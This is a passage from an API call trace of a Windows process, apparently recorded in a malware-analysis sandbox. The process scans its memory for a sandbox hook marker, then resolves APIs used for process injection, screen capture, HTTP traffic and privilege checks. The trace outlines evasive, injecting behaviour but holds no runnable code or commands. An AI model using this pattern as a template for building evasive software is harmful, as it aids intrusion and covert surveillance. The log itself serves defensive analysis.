AllocationBase=0x76710000, AllocationProtect=0x80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.286] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x7685a000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x7685a000, AllocationBase=0x76710000, AllocationProtect=0x80, RegionSize=0x12000, State=0x1000, Protect=0x2, Type=0x1000000), ResultLength=0x0) returned 0x0 [0041.286] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x7686c000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x7686c000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x34000, State=0x10000, Protect=0x1, Type=0x0), ResultLength=0x0) returned 0x0 [0041.287] GetModuleHandleA (lpModuleName=0x0) returned 0x10000000 [0041.287] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.287] GetCurrentProcess () returned 0xffffffff [0041.287] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x76710000, lpBuffer=0x4730020, nSize=0x15c000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x4730020*, lpNumberOfBytesRead=0x18a9ac*=0x15c000) returned 1 [0041.325] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.325] GetCurrentProcess () returned 0xffffffff [0041.325] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x768a0000, lpBuffer=0x4730020, nSize=0x19d000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x4730020*, lpNumberOfBytesRead=0x18a9ac*=0x19d000) returned 1 [0041.384] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.384] GetCurrentProcess () returned 0xffffffff [0041.384] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x76a40000, lpBuffer=0x4730020, nSize=0xac000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x4730020*, lpNumberOfBytesRead=0x18a9ac*=0xac000) returned 1 [0041.403] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.403] GetCurrentProcess () returned 0xffffffff [0041.403] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x76d90000, lpBuffer=0x4730020, nSize=0x1a9000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x4730020*, lpNumberOfBytesRead=0x18a9ac*=0x1a9000) returned 1 [0041.437] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.437] GetCurrentProcess () returned 0xffffffff [0041.437] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x76f70000, lpBuffer=0x4730020, nSize=0x180000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x4730020, lpNumberOfBytesRead=0x18a9ac) returned 0 [0041.438] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x770f0000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x770f0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x7e60000, State=0x10000, Protect=0x1, Type=0x0), ResultLength=0x0) returned 0x0 [0041.438] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x7ef50000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x7ef50000, AllocationBase=0x7ef50000, AllocationProtect=0x4, RegionSize=0x60000, State=0x2000, Protect=0x0, Type=0x20000), ResultLength=0x0) returned 0x0 [0041.438] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x7efb0000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x7efb0000, AllocationBase=0x7efb0000, AllocationProtect=0x2, RegionSize=0x23000, State=0x1000, Protect=0x2, Type=0x40000), ResultLength=0x0) returned 0x0 [0041.438] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x7efd3000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x7efd3000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x2000, State=0x10000, Protect=0x1, Type=0x0), ResultLength=0x0) returned 0x0 [0041.438] GetModuleHandleA (lpModuleName=0x0) returned 0x10000000 [0041.439] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.439] GetCurrentProcess () returned 0xffffffff [0041.439] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7efb0000, lpBuffer=0x2da0058, nSize=0x23000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x2da0058*, lpNumberOfBytesRead=0x18a9ac*=0x23000) returned 1 [0041.440] strlen (_Str="SnxHk_InstallHook") returned 0x11 [0041.440] GetCurrentProcess () returned 0xffffffff [0041.440] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7efe0000, lpBuffer=0x48c0020, nSize=0x100000, lpNumberOfBytesRead=0x18a9ac | out: lpBuffer=0x48c0020, lpNumberOfBytesRead=0x18a9ac) returned 0 [0041.441] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x7f0e0000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x7f0e0000, AllocationBase=0x7f0e0000, AllocationProtect=0x2, RegionSize=0xf00000, State=0x2000, Protect=0x0, Type=0x20000), ResultLength=0x0) returned 0x0 [0041.441] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x7ffe0000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x7ffe0000, AllocationBase=0x7ffe0000, AllocationProtect=0x2, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x20000), ResultLength=0x0) returned 0x0 [0041.441] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x7ffe1000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18a9b0, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x18a9b0*(BaseAddress=0x7ffe1000, AllocationBase=0x7ffe0000, AllocationProtect=0x2, RegionSize=0xf000, State=0x2000, Protect=0x1, Type=0x20000), ResultLength=0x0) returned 0x0 [0041.441] Sleep (dwMilliseconds=0x3e1) [0042.435] CryptAcquireContextW (in: phProv=0x590ff0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x590ff0*=0x597580) returned 1 [0042.464] CryptCreateHash (in: hProv=0x597580, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x590ff4 | out: phHash=0x590ff4) returned 1 [0042.465] CryptHashData (hHash=0x58ebb0, pbData=0x49d0048, dwDataLen=0x6f600, dwFlags=0x0) returned 1 [0042.466] CryptGetHashParam (in: hHash=0x58ebb0, dwParam=0x2, pbData=0x588b70, pdwDataLen=0x18aa18, dwFlags=0x0 | out: pbData=0x588b70, pdwDataLen=0x18aa18) returned 1 [0042.466] CryptDestroyHash (hHash=0x58ebb0) returned 1 [0042.466] CryptReleaseContext (hProv=0x597580, dwFlags=0x0) returned 1 [0042.469] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76600000 [0042.469] GetProcAddress (hModule=0x76600000, lpProcName="DecodePointer") returned 0x76fa9d35 [0042.469] GetProcAddress (hModule=0x76600000, lpProcName="VirtualQuery") returned 0x7661445a [0042.470] GetProcAddress (hModule=0x76600000, lpProcName="FlushFileBuffers") returned 0x7661469b [0042.470] GetProcAddress (hModule=0x76600000, lpProcName="CopyFileW") returned 0x7663830d [0042.470] GetProcAddress (hModule=0x76600000, lpProcName="Sleep") returned 0x766110ff [0042.470] GetProcAddress (hModule=0x76600000, lpProcName="GetShortPathNameW") returned 0x7661d2f9 [0042.470] GetProcAddress (hModule=0x76600000, lpProcName="GetCommandLineW") returned 0x76615223 [0042.470] GetProcAddress (hModule=0x76600000, lpProcName="OpenEventW") returned 0x766115d6 [0042.470] GetProcAddress (hModule=0x76600000, lpProcName="SetErrorMode") returned 0x76611b00 [0042.470] GetProcAddress (hModule=0x76600000, lpProcName="DuplicateHandle") returned 0x76611886 [0042.470] GetProcAddress (hModule=0x76600000, lpProcName="GetModuleFileNameW") returned 0x76614950 [0042.471] GetProcAddress (hModule=0x76600000, lpProcName="CreateProcessW") returned 0x7661103d [0042.471] GetProcAddress (hModule=0x76600000, lpProcName="RemoveDirectoryW") returned 0x766944cf [0042.471] GetProcAddress (hModule=0x76600000, lpProcName="OpenMutexA") returned 0x7662ec6f [0042.471] GetProcAddress (hModule=0x76600000, lpProcName="GetComputerNameW") returned 0x7661dd0e [0042.471] GetProcAddress (hModule=0x76600000, lpProcName="GetSystemDirectoryW") returned 0x76615063 [0042.471] GetProcAddress (hModule=0x76600000, lpProcName="ResumeThread") returned 0x766143ef [0042.471] GetProcAddress (hModule=0x76600000, lpProcName="CreateEventA") returned 0x7661328c [0042.471] GetProcAddress (hModule=0x76600000, lpProcName="GetEnvironmentVariableW") returned 0x76611b48 [0042.471] GetProcAddress (hModule=0x76600000, lpProcName="CreateMutexA") returned 0x76614c6b [0042.472] GetProcAddress (hModule=0x76600000, lpProcName="FindFirstFileW") returned 0x76614435 [0042.472] GetProcAddress (hModule=0x76600000, lpProcName="FindNextFileW") returned 0x766154ee [0042.472] GetProcAddress (hModule=0x76600000, lpProcName="FindClose") returned 0x76614442 [0042.472] GetProcAddress (hModule=0x76600000, lpProcName="RegisterWaitForSingleObject") returned 0x7663cb05 [0042.472] GetProcAddress (hModule=0x76600000, lpProcName="UnregisterWaitEx") returned 0x7663b921 [0042.472] GetProcAddress (hModule=0x76600000, lpProcName="CreateToolhelp32Snapshot") returned 0x7663735f [0042.472] GetProcAddress (hModule=0x76600000, lpProcName="Process32FirstW") returned 0x76638baf [0042.472] GetProcAddress (hModule=0x76600000, lpProcName="Process32NextW") returned 0x7663896c [0042.472] GetProcAddress (hModule=0x76600000, lpProcName="UnregisterWait") returned 0x7669e6ab [0042.473] GetProcAddress (hModule=0x76600000, lpProcName="CancelIo") returned 0x7668bce9 [0042.473] GetProcAddress (hModule=0x76600000, lpProcName="LocalFree") returned 0x76612d3c [0042.473] GetProcAddress (hModule=0x76600000, lpProcName="GetTempPathW") returned 0x7662d4dc [0042.473] GetProcAddress (hModule=0x76600000, lpProcName="GetTempFileNameW") returned 0x7663d1b6 [0042.473] GetProcAddress (hModule=0x76600000, lpProcName="VirtualAlloc") returned 0x76611856 [0042.473] GetProcAddress (hModule=0x76600000, lpProcName="VirtualFree") returned 0x7661186e [0042.473] GetProcAddress (hModule=0x76600000, lpProcName="VirtualAllocEx") returned 0x7662d9b0 [0042.473] GetProcAddress (hModule=0x76600000, lpProcName="WriteProcessMemory") returned 0x7662d9e0 [0042.473] GetProcAddress (hModule=0x76600000, lpProcName="GetThreadContext") returned 0x766379d4 [0042.474] GetProcAddress (hModule=0x76600000, lpProcName="SetThreadContext") returned 0x76695393 [0042.474] GetProcAddress (hModule=0x76600000, lpProcName="VirtualFreeEx") returned 0x7662d9c8 [0042.474] GetProcAddress (hModule=0x76600000, lpProcName="GetProcAddress") returned 0x76611222 [0042.474] GetProcAddress (hModule=0x76600000, lpProcName="GetCurrentProcess") returned 0x76611809 [0042.474] GetProcAddress (hModule=0x76600000, lpProcName="GetProcessId") returned 0x7663cf04 [0042.474] GetProcAddress (hModule=0x76600000, lpProcName="CreateFileA") returned 0x766153c6 [0042.474] GetProcAddress (hModule=0x76600000, lpProcName="TlsGetValue") returned 0x766111e0 [0042.474] GetProcAddress (hModule=0x76600000, lpProcName="TlsAlloc") returned 0x766149ad [0042.474] GetProcAddress (hModule=0x76600000, lpProcName="TlsFree") returned 0x76613587 [0042.474] GetProcAddress (hModule=0x76600000, lpProcName="CreateIoCompletionPort") returned 0x7662eef2 [0042.475] GetProcAddress (hModule=0x76600000, lpProcName="PostQueuedCompletionStatus") returned 0x7662ef29 [0042.475] GetProcAddress (hModule=0x76600000, lpProcName="TerminateProcess") returned 0x7662d802 [0042.475] GetProcAddress (hModule=0x76600000, lpProcName="TlsSetValue") returned 0x766114fb [0042.475] GetProcAddress (hModule=0x76600000, lpProcName="DeleteTimerQueueTimer") returned 0x7662f7d3 [0042.475] GetProcAddress (hModule=0x76600000, lpProcName="CreateTimerQueueTimer") returned 0x7662f7eb [0042.475] GetProcAddress (hModule=0x76600000, lpProcName="CreateNamedPipeA") returned 0x76691807 [0042.475] GetProcAddress (hModule=0x76600000, lpProcName="ConnectNamedPipe") returned 0x766940fb [0042.476] GetProcAddress (hModule=0x76600000, lpProcName="CreateDirectoryW") returned 0x76614259 [0042.476] GetProcAddress (hModule=0x76600000, lpProcName="GetExitCodeProcess") returned 0x7662174d [0042.476] GetProcAddress (hModule=0x76600000, lpProcName="GlobalFree") returned 0x76615558 [0042.476] GetProcAddress (hModule=0x76600000, lpProcName="GetLocaleInfoA") returned 0x7662d5e5 [0042.476] GetProcAddress (hModule=0x76600000, lpProcName="GetSystemTime") returned 0x76615a96 [0042.476] GetProcAddress (hModule=0x76600000, lpProcName="GlobalMemoryStatusEx") returned 0x7663d4c4 [0042.476] GetProcAddress (hModule=0x76600000, lpProcName="MultiByteToWideChar") returned 0x7661192e [0042.476] GetProcAddress (hModule=0x76600000, lpProcName="VerSetConditionMask") returned 0x76fe92b9 [0042.476] GetProcAddress (hModule=0x76600000, lpProcName="VerifyVersionInfoA") returned 0x7662f803 [0042.476] GetProcAddress (hModule=0x76600000, lpProcName="GetModuleHandleA") returned 0x76611245 [0042.477] GetProcAddress (hModule=0x76600000, lpProcName="lstrlenA") returned 0x76615a4b [0042.477] GetProcAddress (hModule=0x76600000, lpProcName="GetVolumeInformationW") returned 0x7662c860 [0042.477] GetProcAddress (hModule=0x76600000, lpProcName="GetFileInformationByHandle") returned 0x766153ae [0042.477] GetProcAddress (hModule=0x76600000, lpProcName="HeapAlloc") returned 0x76f9e026 [0042.477] GetProcAddress (hModule=0x76600000, lpProcName="HeapFree") returned 0x766114c9 [0042.477] GetProcAddress (hModule=0x76600000, lpProcName="GetProcessHeap") returned 0x766114e9 [0042.477] GetProcAddress (hModule=0x76600000, lpProcName="SetUnhandledExceptionFilter") returned 0x766187c9 [0042.477] GetProcAddress (hModule=0x76600000, lpProcName="UnhandledExceptionFilter") returned 0x7663772f [0042.477] GetProcAddress (hModule=0x76600000, lpProcName="RtlUnwind") returned 0x7663d1c3 [0042.478] GetProcAddress (hModule=0x76600000, lpProcName="InterlockedCompareExchange") returned 0x76611484 [0042.478] GetProcAddress (hModule=0x76600000, lpProcName="InterlockedExchange") returned 0x76611462 [0042.478] GetProcAddress (hModule=0x76600000, lpProcName="GetEnvironmentVariableA") returned 0x766133a0 [0042.478] GetProcAddress (hModule=0x76600000, lpProcName="LoadLibraryA") returned 0x766149d7 [0042.478] GetProcAddress (hModule=0x76600000, lpProcName="FreeLibrary") returned 0x766134c8 [0042.478] GetProcAddress (hModule=0x76600000, lpProcName="DeleteFileW") returned 0x766189b3 [0042.478] GetProcAddress (hModule=0x76600000, lpProcName="GetFileAttributesW") returned 0x76611b18 [0042.478] GetProcAddress (hModule=0x76600000, lpProcName="WriteFile") returned 0x76611282 [0042.478] GetProcAddress (hModule=0x76600000, lpProcName="ExitThread") returned 0x76fcd598 [0042.479] GetProcAddress (hModule=0x76600000, lpProcName="SetFilePointer") returned 0x766117d1 [0042.479] GetProcAddress (hModule=0x76600000, lpProcName="OpenProcess") returned 0x76611986 [0042.479] GetProcAddress (hModule=0x76600000, lpProcName="GetModuleHandleW") returned 0x766134b0 [0042.479] GetProcAddress (hModule=0x76600000, lpProcName="GetCurrentProcessId") returned 0x766111f8 [0042.479] GetProcAddress (hModule=0x76600000, lpProcName="GetLocalTime") returned 0x76615aa6 [0042.479] GetProcAddress (hModule=0x76600000, lpProcName="GetLastError") returned 0x766111c0 [0042.479] GetProcAddress (hModule=0x76600000, lpProcName="GetSystemInfo") returned 0x766149ca [0042.479] GetProcAddress (hModule=0x76600000, lpProcName="ExitProcess") returned 0x76617a10 [0042.480] GetProcAddress (hModule=0x76600000, lpProcName="ResetEvent") returned 0x766116dd [0042.480] GetProcAddress (hModule=0x76600000, lpProcName="LeaveCriticalSection") returned 0x76f92270 [0042.480] GetProcAddress (hModule=0x76600000, lpProcName="EnterCriticalSection") returned 0x76f922b0 [0042.480] GetProcAddress (hModule=0x76600000, lpProcName="DeleteCriticalSection") returned 0x76fa45f5 [0042.480] GetProcAddress (hModule=0x76600000, lpProcName="InitializeCriticalSection") returned 0x76fa2c42 [0042.480] GetProcAddress (hModule=0x76600000, lpProcName="SetEvent") returned 0x766116c5 [0042.480] GetProcAddress (hModule=0x76600000, lpProcName="CreateEventW") returned 0x7661183e [0042.480] GetProcAddress (hModule=0x76600000, lpProcName="GetCurrentThreadId") returned 0x76611450 [0042.481] GetProcAddress (hModule=0x76600000, lpProcName="GetSystemTimeAsFileTime") returned 0x76613509 [0042.481] GetProcAddress (hModule=0x76600000, lpProcName="SystemTimeToFileTime") returned 0x76615a7e [0042.481] GetProcAddress (hModule=0x76600000, lpProcName="TerminateThread") returned 0x76617a2f [0042.481] GetProcAddress (hModule=0x76600000, lpProcName="WaitForSingleObject") returned 0x76611136 [0042.481] GetProcAddress (hModule=0x76600000, lpProcName="CreateThread") returned 0x766134d5 [0042.481] GetProcAddress (hModule=0x76600000, lpProcName="OutputDebugStringA") returned 0x7663b2b7 [0042.481] GetProcAddress (hModule=0x76600000, lpProcName="CloseHandle") returned 0x76611410 [0042.481] GetProcAddress (hModule=0x76600000, lpProcName="GetTickCount") returned 0x7661110c [0042.481] GetProcAddress (hModule=0x76600000, lpProcName="ReadFile") returned 0x76613ed3 [0042.482] GetProcAddress (hModule=0x76600000, lpProcName="GetFileSize") returned 0x7661196e [0042.482] GetProcAddress (hModule=0x76600000, lpProcName="GetQueuedCompletionStatus") returned 0x7662d3c3 [0042.482] GetProcAddress (hModule=0x76600000, lpProcName="CreateFileW") returned 0x76613f5c [0042.482] GetProcAddress (hModule=0x76600000, lpProcName="QueryPerformanceCounter") returned 0x76611725 [0042.482] GetProcAddress (hModule=0x76600000, lpProcName="WideCharToMultiByte") returned 0x7661170d [0042.482] GetProcAddress (hModule=0x76600000, lpProcName="LoadLibraryW") returned 0x7661492b [0042.482] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74ca0000 [0042.482] GetProcAddress (hModule=0x74ca0000, lpProcName="GetIconInfo") returned 0x74cc49ea [0042.482] GetProcAddress (hModule=0x74ca0000, lpProcName="GetCursorPos") returned 0x74cc1218 [0042.483] GetProcAddress (hModule=0x74ca0000, lpProcName="DrawIcon") returned 0x74cc8deb [0042.483] GetProcAddress (hModule=0x74ca0000, lpProcName="ReleaseDC") returned 0x74cb7446 [0042.483] GetProcAddress (hModule=0x74ca0000, lpProcName="GetDesktopWindow") returned 0x74cc0a19 [0042.483] GetProcAddress (hModule=0x74ca0000, lpProcName="GetDC") returned 0x74cb72c4 [0042.483] GetProcAddress (hModule=0x74ca0000, lpProcName="GetSystemMetrics") returned 0x74cb7d2f [0042.483] GetProcAddress (hModule=0x74ca0000, lpProcName="GetLastInputInfo") returned 0x74ccb382 [0042.483] GetProcAddress (hModule=0x74ca0000, lpProcName="CharLowerA") returned 0x74cc3e75 [0042.483] GetProcAddress (hModule=0x74ca0000, lpProcName="GetWindowRect") returned 0x74cb7f34 [0042.484] GetProcAddress (hModule=0x74ca0000, lpProcName="GetMessageW") returned 0x74cb78e2 [0042.484] GetProcAddress (hModule=0x74ca0000, lpProcName="PostMessageW") returned 0x74cc12a5 [0042.484] GetProcAddress (hModule=0x74ca0000, lpProcName="MessageBoxA") returned 0x74d0fd1e [0042.484] GetProcAddress (hModule=0x74ca0000, lpProcName="MessageBoxW") returned 0x74d0fd3f [0042.484] GetProcAddress (hModule=0x74ca0000, lpProcName="LoadImageA") returned 0x74cc8455 [0042.484] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x760d0000 [0042.506] GetProcAddress (hModule=0x760d0000, lpProcName="CryptImportPublicKeyInfo") returned 0x760e6c0e [0042.506] GetProcAddress (hModule=0x760d0000, lpProcName="CryptStringToBinaryA") returned 0x76105d77 [0042.507] GetProcAddress (hModule=0x760d0000, lpProcName="CryptDecodeObjectEx") returned 0x760dd718 [0042.507] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x762f0000 [0042.507] GetProcAddress (hModule=0x762f0000, lpProcName=0xb) returned 0x762f311b [0042.507] GetProcAddress (hModule=0x762f0000, lpProcName=0x9) returned 0x762f2d8b [0042.507] GetProcAddress (hModule=0x762f0000, lpProcName="WSASocketW") returned 0x762f3cd3 [0042.507] GetProcAddress (hModule=0x762f0000, lpProcName="WSASendTo") returned 0x7630b30c [0042.507] GetProcAddress (hModule=0x762f0000, lpProcName=0x6f) returned 0x762f37ad [0042.507] GetProcAddress (hModule=0x762f0000, lpProcName=0x3) returned 0x762f3918 [0042.507] GetProcAddress (hModule=0x762f0000, lpProcName="WSARecvFrom") returned 0x762fcba6 [0042.507] GetProcAddress (hModule=0x762f0000, lpProcName="WSAIoctl") returned 0x762f2fe7 [0042.508] GetProcAddress (hModule=0x762f0000, lpProcName=0x15) returned 0x762f41b6 [0042.508] GetProcAddress (hModule=0x762f0000, lpProcName=0x2) returned 0x762f4582 [0042.508] GetProcAddress (hModule=0x762f0000, lpProcName=0xc) returned 0x762fb131 [0042.508] GetProcAddress (hModule=0x762f0000, lpProcName="WSASend") returned 0x762f4406 [0042.508] GetProcAddress (hModule=0x762f0000, lpProcName=0x5) returned 0x762f7147 [0042.508] GetProcAddress (hModule=0x762f0000, lpProcName=0x73) returned 0x762f3ab2 [0042.508] GetProcAddress (hModule=0x762f0000, lpProcName="WSARecv") returned 0x762f7089 [0042.508] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x743a0000 [0042.525] GetProcAddress (hModule=0x743a0000, lpProcName="DnsWriteQuestionToBuffer_UTF8") returned 0x743cadbb [0042.525] GetProcAddress (hModule=0x743a0000, lpProcName="DnsExtractRecordsFromMessage_UTF8") returned 0x743caf44 [0042.525] GetProcAddress (hModule=0x743a0000, lpProcName="DnsFree") returned 0x743a436b [0042.525] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x74c90000 [0042.533] GetProcAddress (hModule=0x74c90000, lpProcName="GetModuleBaseNameA") returned 0x74c915a4 [0042.533] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76710000 [0042.533] GetProcAddress (hModule=0x76710000, lpProcName="CoCreateGuid") returned 0x767515d5 [0042.534] GetProcAddress (hModule=0x76710000, lpProcName="CoInitializeEx") returned 0x767509ad [0042.534] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74ea0000 [0042.534] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptGetHashParam") returned 0x74eadf7e [0042.534] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptReleaseContext") returned 0x74eae124 [0042.534] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptAcquireContextW") returned 0x74eadf14 [0042.534] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptCreateHash") returned 0x74eadf4e [0042.534] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptHashData") returned 0x74eadf36 [0042.535] GetProcAddress (hModule=0x74ea0000, lpProcName="GetUserNameW") returned 0x74eb157a [0042.535] GetProcAddress (hModule=0x74ea0000, lpProcName="InitializeSecurityDescriptor") returned 0x74eb4620 [0042.535] GetProcAddress (hModule=0x74ea0000, lpProcName="SetSecurityDescriptorDacl") returned 0x74eb415e [0042.535] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptVerifySignatureW") returned 0x74eac54a [0042.535] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptDestroyKey") returned 0x74eac51a [0042.535] GetProcAddress (hModule=0x74ea0000, lpProcName="RegOpenKeyExA") returned 0x74eb4907 [0042.535] GetProcAddress (hModule=0x74ea0000, lpProcName="RegQueryValueExA") returned 0x74eb48ef [0042.536] GetProcAddress (hModule=0x74ea0000, lpProcName="RegCloseKey") returned 0x74eb469d [0042.536] GetProcAddress (hModule=0x74ea0000, lpProcName="OpenProcessToken") returned 0x74eb4304 [0042.536] GetProcAddress (hModule=0x74ea0000, lpProcName="GetTokenInformation") returned 0x74eb431c [0042.536] GetProcAddress (hModule=0x74ea0000, lpProcName="GetSidSubAuthorityCount") returned 0x74eb0e0c [0042.536] GetProcAddress (hModule=0x74ea0000, lpProcName="GetSidSubAuthority") returned 0x74eb0e24 [0042.536] GetProcAddress (hModule=0x74ea0000, lpProcName="AllocateAndInitializeSid") returned 0x74eb40e6 [0042.536] GetProcAddress (hModule=0x74ea0000, lpProcName="CheckTokenMembership") returned 0x74eadf04 [0042.537] GetProcAddress (hModule=0x74ea0000, lpProcName="FreeSid") returned 0x74eb412e [0042.537] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptDestroyHash") returned 0x74eadf66 [0042.537] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x74f40000 [0043.367] GetProcAddress (hModule=0x74f40000, lpProcName="CommandLineToArgvW") returned 0x74f59ee8 [0043.367] GetProcAddress (hModule=0x74f40000, lpProcName="ShellExecuteExW") returned 0x74f61e46 [0043.367] GetProcAddress (hModule=0x74f40000, lpProcName="SHGetFolderPathW") returned 0x74fc5708 [0043.367] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76070000 [0043.367] GetProcAddress (hModule=0x76070000, lpProcName="PathIsDirectoryW") returned 0x7607ff07 [0043.368] GetProcAddress (hModule=0x76070000, lpProcName=0xc) returned 0x7608158a [0043.368] GetProcAddress (hModule=0x76070000, lpProcName="PathAppendW") returned 0x760881ef [0043.368] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x74340000 [0043.394] GetProcAddress (hModule=0x74340000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7435257e [0043.394] GetProcAddress (hModule=0x74340000, lpProcName="WinHttpAddRequestHeaders") returned 0x74359dfb [0043.395] GetProcAddress (hModule=0x74340000, lpProcName="WinHttpOpen") returned 0x743458b9 [0043.395] GetProcAddress (hModule=0x74340000, lpProcName="WinHttpCloseHandle") returned 0x74342c01 [0043.395] GetProcAddress (hModule=0x74340000, lpProcName="WinHttpConnect") returned 0x7434d9f5 [0043.395] GetProcAddress (hModule=0x74340000, lpProcName="WinHttpOpenRequest") returned 0x74344aea [0043.395] GetProcAddress (hModule=0x74340000, lpProcName="WinHttpSetOption") returned 0x74343f6c [0043.395] GetProcAddress (hModule=0x74340000, lpProcName="WinHttpSendRequest") returned 0x743479bd [0043.395] GetProcAddress (hModule=0x74340000, lpProcName="WinHttpReceiveResponse") returned 0x7434b262 [0043.395] GetProcAddress (hModule=0x74340000, lpProcName="WinHttpWriteData") returned 0x7435abfd [0043.396] GetProcAddress (hModule=0x74340000, lpProcName="WinHttpQueryHeaders") returned 0x7434ba51 [0043.396] GetProcAddress (hModule=0x74340000, lpProcName="WinHttpQueryDataAvailable") returned 0x7435c5dd [0043.396] GetProcAddress (hModule=0x74340000, lpProcName="WinHttpReadData") returned 0x7434cb9e [0043.396] GetProcAddress (hModule=0x74340000, lpProcName="WinHttpSetStatusCallback") returned 0x74345ebd [0043.396] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x763f0000 [0043.396] GetProcAddress (hModule=0x763f0000, lpProcName="CreateCompatibleDC") returned 0x764054f4 [0043.396] GetProcAddress (hModule=0x763f0000, lpProcName="SelectObject") returned 0x76404f70 [0043.396] GetProcAddress (hModule=0x763f0000, lpProcName="BitBlt") returned 0x76405ea6 [0043.396] GetProcAddress (hModule=0x763f0000, lpProcName="DeleteDC") returned 0x764058b3 [0043.397] GetProcAddress (hModule=0x763f0000, lpProcName="DeleteObject") returned 0x76405689 [0043.397] GetProcAddress (hModule=0x763f0000, lpProcName="GetDeviceCaps") returned 0x76404de0 [0043.397] GetProcAddress (hModule=0x763f0000, lpProcName="CreateCompatibleBitmap") returned 0x76405f49 [0043.397] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x76f70000 [0043.397] GetProcAddress (hModule=0x76f70000, lpProcName="RtlRandom") returned 0x770398c3 [0043.397] GetProcAddress (hModule=0x76f70000, lpProcName="ZwQueryObject") returned 0x76f8f9e8 [0043.397] GetProcAddress (hModule=0x76f70000, lpProcName="RtlImageNtHeader") returned 0x76fa3164 [0043.397] GetProcAddress (hModule=0x76f70000, lpProcName="ZwQuerySystemInformation") returned 0x76f8fda0 [0043.397] GetProcAddress (hModule=0x76f70000, lpProcName="NtQuerySystemInformation") returned 0x76f8fda0 [0043.397] LoadLibraryA (lpLibFileName="gdiplus.dll") returned 0x74160000 [0043.428] GetProcAddress (hModule=0x74160000, lpProcName="GdiplusStartup") returned 0x74185600 [0043.428] GetProcAddress (hModule=0x74160000, lpProcName="GdiplusShutdown") returned 0x741856be [0043.428] GetProcAddress (hModule=0x74160000, lpProcName="GdipAlloc") returned 0x741a2437 [0043.428] 